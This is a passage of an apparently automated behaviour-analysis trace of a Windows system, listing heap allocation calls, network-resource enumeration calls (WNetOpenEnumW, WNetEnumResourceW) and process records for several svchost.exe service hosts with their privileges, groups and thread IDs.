hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7908 | out: hHeap=0x620000) returned 1 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7908 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7950 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x33fd5c8 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7290 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7a70 [0227.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d79e0 | out: hHeap=0x620000) returned 1 [0227.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7998 | out: hHeap=0x620000) returned 1 [0227.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7998 [0227.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d79e0 [0227.221] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3b70068, lphEnum=0x3b6fe28 | out: lphEnum=0x3b6fe28*=0x3b6fe44) returned 0x4b8 [0242.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7950 | out: hHeap=0x620000) returned 1 [0242.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7908 | out: hHeap=0x620000) returned 1 [0242.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0242.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0242.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x150) returned 0x33adda8 [0242.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7908 [0242.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7950 [0242.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fbf8 [0242.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fc40 [0242.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7a70 | out: hHeap=0x620000) returned 1 [0242.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7290 | out: hHeap=0x620000) returned 1 [0242.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d79e0 | out: hHeap=0x620000) returned 1 [0242.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7998 | out: hHeap=0x620000) returned 1 [0242.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd5c8 | out: hHeap=0x620000) returned 1 [0242.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0242.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1958 [0242.918] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3b70088, lphEnum=0x3b6fe28 | out: lphEnum=0x3b6fe28*=0x3b6fe44) returned 0x4c6 [0242.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0242.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0242.923] WNetEnumResourceW (in: hEnum=0x33f0388, lpcCount=0x3b6fedc, lpBuffer=0x3b70048, lpBufferSize=0x3b6fed8 | out: lpcCount=0x3b6fedc, lpBuffer=0x3b70048, lpBufferSize=0x3b6fed8) returned 0x103 [0242.923] WNetCloseEnum (hEnum=0x33f0388) returned 0x0 [0242.923] SendMessageW (hWnd=0x30152, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7091a000" os_pid = "0x64" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ddf6" [0xc000000f], "LOCAL" [0x7] Thread: id = 60 os_tid = 0x3a8 Thread: id = 61 os_tid = 0x54c Thread: id = 62 os_tid = 0x7c4 Thread: id = 63 os_tid = 0x788 Thread: id = 64 os_tid = 0x780 Thread: id = 65 os_tid = 0x758 Thread: id = 66 os_tid = 0x754 Thread: id = 67 os_tid = 0x688 Thread: id = 68 os_tid = 0x684 Thread: id = 69 os_tid = 0x154 Thread: id = 70 os_tid = 0x150 Thread: id = 71 os_tid = 0x120 Thread: id = 72 os_tid = 0x124 Thread: id = 73 os_tid = 0x118 Thread: id = 74 os_tid = 0xc8 Thread: id = 162 os_tid = 0x6f0 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x155a5000" os_pid = "0x4a8" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010810" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 75 os_tid = 0x188 Thread: id = 76 os_tid = 0x7a8 Thread: id = 77 os_tid = 0x7a4 Thread: id = 78 os_tid = 0x7a0 Thread: id = 79 os_tid = 0x794 Thread: id = 80 os_tid = 0x78c Thread: id = 81 os_tid = 0x76c Thread: id = 82 os_tid = 0x6b0 Thread: id = 83 os_tid = 0x6a4 Thread: id = 84 os_tid = 0x6a0 Thread: id = 85 os_tid = 0x69c Thread: id = 86 os_tid = 0x698 Thread: id = 87 os_tid = 0x690 Thread: id = 88 os_tid = 0x680 Thread: id = 89 os_tid = 0x644 Thread: id = 90 os_tid = 0x630 Thread: id = 91 os_tid = 0x628 Thread: id = 92 os_tid = 0x60c Thread: id = 93 os_tid = 0x550 Thread: id = 94 os_tid = 0x4f8 Thread: id = 95 os_tid = 0x4e8 Thread: id = 96 os_tid = 0x4d0 Thread: id = 97 os_tid = 0x4b8 Thread: id = 98 os_tid = 0x4ac Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x70d0a000" os_pid = "0x374" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cfab" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 101 os_tid = 0x2b4 Thread: id = 102 os_tid = 0x584 Thread: id = 103 os_tid = 0x410 Thread: id = 104 os_tid = 0x43c Thread: id = 105 os_tid = 0x514 Thread: id = 106 os_tid = 0x370 Thread: id = 107 os_tid = 0x55c Thread: id = 108 os_tid = 0x534 Thread: id = 109 os_tid = 0x7fc Thread: id = 110 os_tid = 0x7d4 Thread: id = 111 os_tid = 0x7cc Thread: id = 112 os_tid = 0x7c0 Thread: id = 113 os_tid = 0x7bc Thread: id = 114 os_tid = 0x744 Thread: id = 115 os_tid = 0x738 Thread: id = 116 os_tid = 0x734 Thread: id = 117 os_tid = 0x728 Thread: id = 118 os_tid = 0x720 Thread: id = 119 os_tid = 0x718 Thread: id = 120 os_tid = 0x714 Thread: id = 121 os_tid = 0x70c Thread: id = 122 os_tid = 0x704 Thread: id = 123 os_tid = 0x700 Thread: id = 124 os_tid = 0x6fc Thread: id = 125 os_tid = 0x6f8 Thread: id = 126 os_tid = 0x6ec Thread: id = 127 os_tid = 0x42c Thread: id = 128 os_tid = 0x268 Thread: id = 129 os_tid = 0x470 Thread: id = 130 os_tid = 0x434 Thread: id = 131 os_tid = 0x430 Thread: id = 132 os_tid = 0x424 Thread: id = 133 os_tid = 0x420 Thread: id = 134 os_tid = 0x418 Thread: id = 135 os_tid = 0x404 Thread: id = 136 os_tid = 0x128 Thread: id = 137 os_tid = 0x3d8 Thread: id = 138 os_tid = 0xf0 Thread: id = 139 os_tid = 0x3f8 Thread: id = 140 os_tid = 0x3ec Thread: id = 141 os_tid = 0x3a0 Thread: id = 142 os_tid = 0x394 Thread: id = 143 os_tid = 0x390 Thread: id = 144 os_tid = 0x38c Thread: id = 145 os_tid = 0x380 Thread: id = 146 os_tid = 0x378 Thread: id = 150 os_tid = 0x364 Thread: id = 151 os_tid = 0x35c Thread: id = 152 os_tid = 0x624 Thread: id = 153 os_tid = 0x638 Thread: id = 154 os_tid = 0x61c Thread: id = 155 os_tid = 0x62c Thread: id = 156 os_tid = 0x63c Thread: id = 157 os_tid = 0x634 Thread: id = 158 os_tid = 0x674 Thread: id = 159 os_tid = 0x68c Thread: id = 160 os_tid = 0x6c4 Thread: id = 161 os_tid = 0x6d4